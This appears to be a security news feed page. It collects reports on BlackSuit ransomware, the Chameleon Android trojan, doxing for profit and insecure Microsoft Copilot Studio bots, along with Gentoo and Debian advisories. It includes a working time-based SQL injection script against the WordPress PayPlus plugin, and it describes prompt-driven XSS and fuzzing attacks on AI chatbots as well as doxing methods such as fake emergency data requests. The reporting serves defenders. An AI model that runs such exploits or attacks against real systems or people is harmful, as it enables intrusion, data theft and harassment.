The ransomware strain known as BlackSuit has demanded as much as $500 million in ransoms to date, with one individual ransom demand hitting $60 million.
That's according to an updated advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI).
"BlackSuit actors have exhibited a willingness to negotiate payment amounts," the

Critical Infrastructure / Malware

The ransomware strain known as BlackSuit has demanded as much as $500 million in ransoms to date, with one individual ransom demand hitting $60 million.

That's according to an updated advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI).

"BlackSuit actors have exhibited a willingness to negotiate payment amounts," the agencies said. "Ransom amounts are not part of the initial ransom note, but require direct interaction with the threat actor via a .onion URL (reachable through the Tor browser) provided after encryption."

Attacks involving ransomware have targeted several critical infrastructure sectors spanning commercial facilities, healthcare and public health, government facilities, and critical manufacturing.

An evolution of the Royal ransomware, it leverages the initial access obtained via phishing emails to disarm antivirus software and exfiltrate sensitive data before ultimately deploying the ransomware and encrypting the systems.

Other common infection pathways include the use of Remote Desktop Protocol (RDP), exploitation of vulnerable internet-facing applications, and access purchased via initial access brokers (IABs).

BlackSuit actors are known to use legitimate remote monitoring and management (RMM) software and tools like SystemBC and GootLoader malware to maintain persistence in victim networks.

"BlackSuit actors have been observed using SharpShares and SoftPerfect NetWorx to enumerate victim networks," the agencies noted. "The publicly available credential stealing tool Mimikatz and password harvesting tools from Nirsoft have also been found on victim systems. Tools such as PowerTool and GMER are often used to kill system processes."

CISA and FBI have warned of an uptick in cases where victims receive telephonic or email communications from BlackSuit actors regarding the compromise and ransom, a tactic that's increasingly being adopted by ransomware gangs to ramp up pressure.

"In recent years, threat actors appear to be increasingly interested in not merely threatening organizations directly, but also secondary victims," cybersecurity firm Sophos said in a report published this week. "For instance, as reported in January 2024, attackers threatened to 'swat' patients of a cancer hospital, and have sent threatening text messages to a CEO's spouse."

That's not all. Threat actors have also claimed to assess stolen data for evidence of illegal activity, regulatory non-compliance, and financial discrepancies, even going to the extent of stating that an employee at a compromised organization had been searching for child sexual abuse material by posting their web browser history.

Such aggressive methods can not only be used as further leverage to coerce their targets into paying up, they also inflict reputational damage by criticizing them as unethical or negligent.

The development comes amid the emergence of new ransomware families like Lynx, OceanSpy, Radar, Zilla (a Crysis/Dharma ransomware variant), and Zola (a Proton ransomware variant) in the wild, even as existing ransomware groups are constantly evolving their modus operandi by incorporating new tools into their arsenal.

A case example is Hunters International, which has been observed using a new C#-based malware called SharpRhino as an initial infection vector and a remote access trojan (RAT). A variant of the ThunderShell malware family, it's delivered through a typosquatting domain impersonating the popular network administration tool Angry IP Scanner.

It's worth pointing out that malvertising campaigns have been spotted delivering the malware as recently as January 2024, per eSentire. The open-source RAT is also called Parcel RAT and SMOKEDHAM.

"On execution, it establishes persistence and provides the attacker with remote access to the device, which is then utilized to progress the attack," Quorum Cyber researcher Michael Forret said. "Using previously unseen techniques, the malware is able to obtain a high level of permission on the device in order to ensure the attacker is able to further their targeting with minimal disruption."

Hunters International is assessed to be a rebrand of the now-defunct Hive ransomware group. First detected in October 2023, it has claimed responsibility for 134 attacks in the first seven months of 2024.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

FBI and CISA Warn of BlackSuit Ransomware That Demands Up to $500 Million

Attackers can craft a malicious prompt that coerces the language model into executing arbitrary JavaScript in the context of the web page.

**Open WebUI Stored Cross-Site Scripting Vulnerability**

Moderate severity GitHub Reviewed Published Aug 8, 2024 to the GitHub Advisory Database • Updated Aug 8, 2024

GHSA-5jp3-wp5v-5363: Open WebUI Stored Cross-Site Scripting Vulnerability

From tricking companies into handing over victims’ personal data to offering violence as a service, the online doxing ecosystem is not just still a problem—it’s getting more extreme.

Since the early 1990s, people have used doxing as a toxic way to strike digital revenge—stripping away someone’s anonymity by unmasking their identity online. But in recent years, the poisonous practice has taken on new life, with people being doxed and extorted for cryptocurrency and, in the most extreme cases, potentially facing physical violence.

For the past year, security researcher Jacob Larsen—who was a victim of doxing around a decade ago when someone tried to extort him for a gaming account—has been monitoring doxing groups, observing the techniques used to unmask people, and interviewing prominent members of the doxing community. Doxing actions have led to incomes of “well over six figures annually,” and methods include making fake law enforcement requests to get people’s data, according to Larsen’s interviews.

“The primary target of doxing, particularly when it involves a physical extortion component, is for finance,” says Larsen, who leads an offensive security team at cybersecurity company CyberCX but conducted the doxing research in a personal capacity with the support of the company.

Over several online chat sessions last August and September, Larsen interviewed two members of the doxing community: “Ego” and “Reiko.” While neither of their offline identities is publicly known, Ego is believed to have been a member of the five-person doxing group known as ViLe, and Reiko last year acted as an administrator of the biggest public doxing website, Doxbin, as well as being involved in other groups. (Two other ViLe members pleaded guilty to hacking and identity theft in June.) Larsen says both Ego and Reiko deleted their social media accounts since speaking with him, making it impossible for WIRED to speak with them independently.

People can be doxed for a full range of reasons—from harassment in online gaming, to inciting political violence. Doxing can “humiliate, harm, and reduce the informational autonomy” of targeted individuals, says Bree Anderson, a digital criminologist at Deakin University in Australia who has researched the subject with colleagues. There are direct “first-order” harms, such as risks to personal safety, and longer-term “second-order harms,” including anxiety around future disclosures of information, Anderson says.

Larsen’s research mostly focused on those doxing for profit. Doxbin is central to many doxing efforts, with the website hosting more than 176,000 public and private doxes, which can contain names, social media details, Social Security numbers, home addresses, places of work, and similar details belonging to people’s family members. Larsen says he believes most of the doxing on Doxbin is driven by extortion activities, although there can be other motivations and doxing for notoriety. Once information is uploaded, Doxbin will not remove it unless it breaks the website’s terms of service.

“It is your responsibility to uphold your privacy on the internet,” Reiko said in one of the conversations with Larsen, who has published the transcripts. Ego added: “It’s on the users to keep their online security tight, but let’s be real, no matter how careful you are, someone might still track you down.”

**Impersonating Police, Violence as a Service**

Being entirely anonymous online is almost impossible—and many people don’t try, often using their real names and personal details in online accounts and sharing information on social media. Doxing tactics to gather people’s details, some of which were detailed in charges against ViLe members, can include reusing common passwords to access accounts, accessing public and private databases, and social engineering to launch SIM swapping attacks. There are also more nefarious methods.

Emergency data requests (EDR) can also be abused, Larsen says. EDRs allow law enforcement officials to ask tech companies for people’s names and contact details without any court orders as they believe there may be danger or risks to people’s lives. These requests are made directly to tech platforms, often through specific online portals, and broadly need to come from official law enforcement or government email addresses.

Inside the Dark World of Doxing for Profit

The evolving malware is targeting hospitality and other B2C workers in Canada and Europe with capabilities that can evade Android 13 security restrictions.

ImageBroker.com GmbH & Co. KG via Alamy Stock Photo

The Chameleon Android banking Trojan is back on the threat scene, armed with new Android security-bypass features. The malware poses as a customer relationship management (CRM) application and targets employees in the hospitality sector and other business employees on two continents.

Researchers from Threat Fabric revealed that the device-takeover Trojan is targeting "hospitality workers and potentially B2C business employees in general" across Canada and Europe. Researchers say the new variant uses a dropper that can bypass Android 13+ AccessibilityService restrictions.

The Trojan is targeting a popular restaurant chain in Canada, which operates globally, to get access to corporate banking accounts, which would pose a "significant risk" to the organizations breached, according to Threat Fabric.

"The increased likelihood of such access for employees whose roles involve CRM is the likely reason behind the choice of the masquerading during this latest campaign," according to a blog post from Threat Fabric.

Researchers also see evidence of attacks that target "customers of specific financial organizations" in which Chameleon masquerades as a security application to install a security certificate released by the victims' banks as part of the malware's resurgence.

**Shape-Shifting Malware**

Security researchers first detected Chameleon — which got its name for its ability to adapt to its environment through multiple new commands — around December 2022/January 2023, when it appeared in its earliest form as a work in progress. Except for an appearance late last year with a significantly more fully featured variant that could bypass biometric security, the malware has been flying under the radar.

Now it has evolved yet again, with new features that show how its operators are changing the malware to keep up with the Android OS as it also becomes fortified with advanced security features.

According to the Threat Fabric post, "Most significant is the Trojan's ability to bypass Android 13+ restrictions, which once again proves the prediction we made in the past — this capability has become essential for modern banking Trojans."

Chameleon's use of the BrokewellDropper for delivery is significant to this bypass; indeed, since the leak of the source code for the dropper — which has an extensive set of device-takeover capabilities — more threat actors now have access to security bypass on the Android OS, according to Threat Fabric.

**Trojan's Latest Disguise**

Chameleon's most recent disguise should be no surprise to security researchers tracking the Trojan, as the malware, like other Trojans, has historically impersonated trusted apps. Previously, Chameleon came cloaked as an app from institutions such as the Australian Taxation Office (ATO) or one of several popular banking apps in Poland to steal data from user devices.

Once loaded, the dropper displays a fake page masquerading as a CRM login page, requesting the employee ID. It then displays a message asking to reinstall the application, which is actually Chameleon, which installs and bypasses Android AccessibilityService restrictions. After installation, the Trojan loads a fake website again asking for the employee's credentials. If submitted, the app displays an error page, according to Threat Fabric.

Chameleon remains running in the background on a device, which means it can also collect other credentials and sensitive info from a user by using keylogging. "Such information can be used in further attacks or the actors can monetise it by selling  it on underground forums," according to the post.

**More Sophisticated Attacks**

The latest Chameleon campaign demonstrates how Trojan-wielding cybercriminals are finding new and innovative ways to target bigger assets beyond the banking credentials of individual mobile users, according to Threat Fabric. This should put all organizations on high alert to the evolving mobile threat landscape.

"With the rising number of banking products for businesses (especially small and medium) and the convenience of having them available through mobile, we can expect cybercriminals to further explore the approach of targeting such mobile devices and its users," according to the post.

To combat these threats, financial organizations can take preventive measures to educate business customers about the potential impact of mobile banking malware like Chameleon and the consequences these malicious apps can bring, according to Threat Fabric. Moreover, given their visibility into customers' financial accounts, banks should also become more proactive in spotting anomalies in activity and behavior to stop threats before they compromise accounts.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Chameleon Banking Trojan Makes a Comeback Cloaked as CRM App

Microsoft claims 50,000 organizations are using its new Copilot Creation tool, but researcher Michael Bargury demonstrated at Black Hat USA ways it could unleash insecure chatbots.

Source: Brain Light via Alamy Stock Photo

BLACK HAT USA – Las Vegas – Wednesday, Aug. 7 – Enterprise usage of Copilot Studio, Microsoft's automated chatbot creation tool, has grown considerably since its release less than nine months ago. But despite opening the floodgates for anyone to create so-called "copilots," all bots created or modified with the service aren't secure by default.

So says security researcher Michael Bargury, a former senior security architect in Microsoft's Azure Security CTO office, now a project leader for the OWASP Low-Code/No-Code Top 10 Security Risks project and CTO at Zenity.

On Wednesday at Black Hat USA in Las Vegas, Bargury demonstrated how developers could unwittingly build copilots that inadvertently exfiltrate data or bypass policies and data loss prevention controls.

"It's very, very easy to make a mistake with this no-code tool and introduce a serious security vulnerability into a copilot," Bargury tells Dark Reading. "Actually, it's very difficult to get everything right because there are so many ways to get it wrong."

**Rapid Adoption of Copilot Studio**

The drag-and-drop, wizard-based Copilot Creation tool is available to all users of the Microsoft 365 productivity suite and has quickly introduced an easy way for power users in lines of business to create copilots, or AI assistants, that are designed to automate workflows and enable more efficient meetings, among other capabilities.

The addition of Copilot Studio to the mix further allows customers to extend the capability of these bots and build custom copilots.

During Microsoft's fourth quarter, 2024 fiscal year earnings call on July 30, chairman and CEO Satya Nadella touted that the usage of Copilots grew 60% in the last quarter. And the number of organizations that have used Copilot Studio grew by 70% last quarter, reaching 50,000 shops, including Carnival, Cognizant, Eaton, KPMG, Majesco, and McKinsey.

**Initial Release Was "Way Overpermissioned"**

Among some of the initial problems Bargury spotted were in the default settings in the copilot bots created by Copilot Creator. Specifically, many of the bots were publicly accessible without requiring authentication. Also, they could impersonate a user with ease.

"You could create a copilot that bakes your identity into it," he explains. "Now, I talk to that copilot over the Internet without logging in, and I'm using your identity. It was way overpermissioned."

Bargury says he discovered a variety of other security faults following the release of Copilot Studio. For example, someone trying to create a copilot designed to call on public SharePoint sites could also tap a private SharePoint site on the same network. Because the copilots could easily be discovered outside of an organization, they could become conduits for remote attacks.

"I could search the Web for open Copilot Studio bots, and we found tens of thousands of them," Bargury says. "And then I could fuzz those copilots with AI and find out which copilots I could talk to, and find out whether it's willing to talk to me and what kinds of information and operations it could perform. And then I could grab information from them."

He says that Microsoft has fixed the issues and has introduced new admin controls designed to strip away the ability to inadvertently create insecure actions, such as allowing an administrator to disallow users from creating bots that can be shared publicly. Admins should update their implementations to protect their organizations.

**Low Code & Chatbots: Balancing Productivity & Security**

The appeal of Microsoft Copilot and similar bots is that they enable users to be more productive, and they automate many routine tasks. But as this research shows, they can also be a weak link inside an organization. Bargury says he believes Microsoft is committed to ensuring Copilot Studio has better security from here on out.

"I think they are going to continue investing in giving admins more control," he says. "But they are in a tough spot because they need to balance productivity with security. And we know where the balance ends."

In his Black Hat session, Bargury also demonstrated CopilotHunter, a new module for the Power Pwn security tool set for Microsoft's low-code/no-code Power Platform that scans for open Copilot Studio bots and fuzzes them to access the data behind them. It is available on GitHub.

**15 Ways to Break Copilot Studio**

In his conclusion, Bargury broke down the 15 security issues he discovered with Copilot Security.

1.  Unreliable and untrusted input
    
2.  Multiple data leakage scenarios
    
3.  Oversharing sensitive data
    
4.  Unexpected execution path
    
5.  Unexpected execution path and operations
    
6.  Data flowing outside org's compliance and geo boundaries
    
7.  Sensitive data oversharing and leakage
    
8.  Destructive, unpredictable copilot actions
    

10.  Gain unintended data access
    
11.  Hardcoded credentials might be supplied as part of a copilot answer
    
12.  Oversharing copilot access through channels
    

14.  Oversharing copilot ownership with members
    
15.  Oversharing copilot ownership (and more) with guests
    

**About the Author**

Jeffrey Schwartz is a journalist who has covered information security and all forms of business and enterprise IT, including client computing, data center and cloud infrastructure, and application development for more than 30 years. Jeff is a regular contributor to Channel Futures. Previously, he was editor-in-chief of Redmond magazine and contributed to its sister titles Redmond Channel Partner, Application Development Trends, and Virtualization Review. Earlier, he held editorial roles with CommunicationsWeek, InternetWeek, and VARBusiness. Jeff is based in the New York City suburb of Long Island.

Creating Insecure AI Assistants With Microsoft Copilot Studio Is Easy

Gentoo Linux Security Advisory 202408-13 - A vulnerability has been discovered in Nokogiri, which can lead to a denial of service. Versions greater than or equal to 1.13.10 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-13  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Nokogiri: Denial of Service  
     Date: August 07, 2024  
     Bugs: #884863  
       ID: 202408-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Nokogiri, which can lead to a  
denial of service.

Background  
==========

Nokogiri is an HTML, XML, SAX, and Reader parser.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
dev-ruby/nokogiri  < 1.13.10     >= 1.13.10

Description  
===========

A denial of service vulnerability has been discovered in Nokogiri.  
Please review the CVE identifier referenced below for details.

Impact  
======

Nokogiri fails to check the return value from `xmlTextReaderExpand` in  
the method `Nokogiri::XML::Reader#attribute_hash`. This can lead to a  
null pointer exception when invalid markup is being parsed. For  
applications using `XML::Reader` to parse untrusted inputs, this may  
potentially be a vector for a denial of service attack.

Workaround  
==========

Users may be able to search their code for calls to either  
`XML::Reader#attributes` or `XML::Reader#attribute_hash` to determine if  
they are affected.

Resolution  
==========

All Nokogiri users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-ruby/nokogiri-1.13.10"

References  
==========

[ 1 ] CVE-2022-23476  
      https://nvd.nist.gov/vuln/detail/CVE-2022-23476

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-13

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-13

Debian Linux Security Advisory 5740-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, the bypass of sandbox restrictions or an information leak.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5740-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 07, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2024-7519 CVE-2024-7521 CVE-2024-7522 CVE-2024-7524   
                 CVE-2024-7525 CVE-2024-7526 CVE-2024-7527 CVE-2024-7529   
                 CVE-2024-7531

Multiple security issues have been found in the Mozilla Firefox web  
browser, which could potentially result in the execution of arbitrary  
code, the bypass of sandbox restrictions or an information leak.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 115.14.0esr-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 115.14.0esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmazJNEACgkQEMKTtsN8  
Tjbc0A/+ND/PqMdzy6m7syWycmZMYbI+i19RSJHC75rwT3MgVB0U8WkRD1EPe7Uw  
IAYoOJ2zzE8FkgjEgQBwv7S3krhl888NgbRtyFZAX41UjyoZZ4q2T+N0h9DICPcb  
EcuaJCrvai4AsVIK2MXzBza8he1emof0tqXTFTyDpZtiui6fW7sEDL/4TPbaU/+7  
MlM7fjtPnCOBrkxGY7dpnfLX3AlFsbxcpe2cRnCQ/CoAGTJ2/grCGucgFLPHDSut  
rnTXWMzT0H1iXXdEJ688Nl6D50+nNmovzoyCTw3ZGsB/fSAUiFM0Lp0Ct31uLy5l  
uLT4hOEgM1FZGkEmf0mW4Ugwajv161o4uTLJMViai3MGNw+A5G040yAgdgn4ohQn  
Ew1o+im9qLw+pimte8OpixYzJHWw4KPouzJH7SZrlLTilrhDlC22EKE9F6jD0QF2  
9ay/pEbkF6AT4HSgguUzb/6DR21sjkM4x70P6cNYJO6Jak+IMtG4Qp35YIsdO9cn  
0W/nWz5FjtlwvQrCusQ49JM/N23TlFsB2y2+NfCADZb6Q4OkGhRLB9mtdZQUXWOT  
JgsYj9/+pNNkkHQcllPGgSXbtddyxE0OMehN2eWrN/kjcIS6XwxI0j+8eZbY5fcM  
yVdgH2foNnvtPnKCTT3qdq2poLCkvVFNrAyMKCXwkOxTZ1FY5fg=  
=i/4D  
-----END PGP SIGNATURE-----

Debian Security Advisory 5740-1

WordPress PayPlus Payment Gateway plugin versions prior to 6.6.9 suffer from a remote SQL injection vulnerability.

    #!/usr/bin/env python3.11import requestsimport timedef exploit(url):    payload = {"wc-api": "payplus_gateway&status_code=true&more_info=(select*from(select(sleep(5)))a)"}    start = time.time()    with requests.Session() as session:        session.headers.update({            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        })        response = requests.get(url, params=payload)        print(f"Exploiting {url}...")        end = time.time()        print(response.status_code)        response_time = end - start        print(f"Response time: {response_time}...")if __name__ == "__main__":    url = input("Enter the vulnerable URL (e.g., https://test.site): ")    if not url.startswith("http"):        url = "http://" + url    exploit(url)

WordPress PayPlus Payment Gateway SQL Injection

Gentoo Linux Security Advisory 202408-12 - A vulnerability has been discovered in Bitcoin, which can lead to a denial of service. Versions greater than or equal to 25.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-12  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Bitcoin: Denial of Service  
     Date: August 07, 2024  
     Bugs: #908084  
       ID: 202408-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Bitcoin, which can lead to a  
denial of service.

Background  
==========

Bitcoin Core consists of both "full-node" software for fully validating  
the blockchain as well as a bitcoin wallet.

Affected packages  
=================

Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
net-p2p/bitcoind  < 25.0        >= 25.0

Description  
===========

Please review the CVE identifier referenced below for details.

Impact  
======

Bitcoin Core, when debug mode is not used, allows attackers to cause a  
denial of service (CPU consumption) because draining the inventory-to-  
send queue is inefficient, as exploited in the wild in May 2023.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Bitcoin users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-p2p/bitcoind-25.0"

References  
==========

[ 1 ] CVE-2023-33297  
      https://nvd.nist.gov/vuln/detail/CVE-2023-33297

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-12

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-12

Gentoo Linux Security Advisory 202408-11 - Multiple vulnerabilities have been discovered in aiohttp, the worst of which could lead to service compromise. Versions greater than or equal to 3.9.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: aiohttp: Multiple Vulnerabilities  
     Date: August 07, 2024  
     Bugs: #918541, #918968, #931097  
       ID: 202408-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in aiohttp, the worst of  
which could lead to service compromise.

Background  
==========

aiohttp is an asynchronous HTTP client/server framework for asyncio and  
Python.

Affected packages  
=================

Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
dev-python/aiohttp  < 3.9.4       >= 3.9.4

Description  
===========

Multiple vulnerabilities have been discovered in aiohttp. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All aiohttp users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-python/aiohttp-3.9.4"

References  
==========

[ 1 ] CVE-2023-47641  
      https://nvd.nist.gov/vuln/detail/CVE-2023-47641  
[ 2 ] CVE-2023-49082  
      https://nvd.nist.gov/vuln/detail/CVE-2023-49082  
[ 3 ] CVE-2024-30251  
      https://nvd.nist.gov/vuln/detail/CVE-2024-30251

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-11

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#web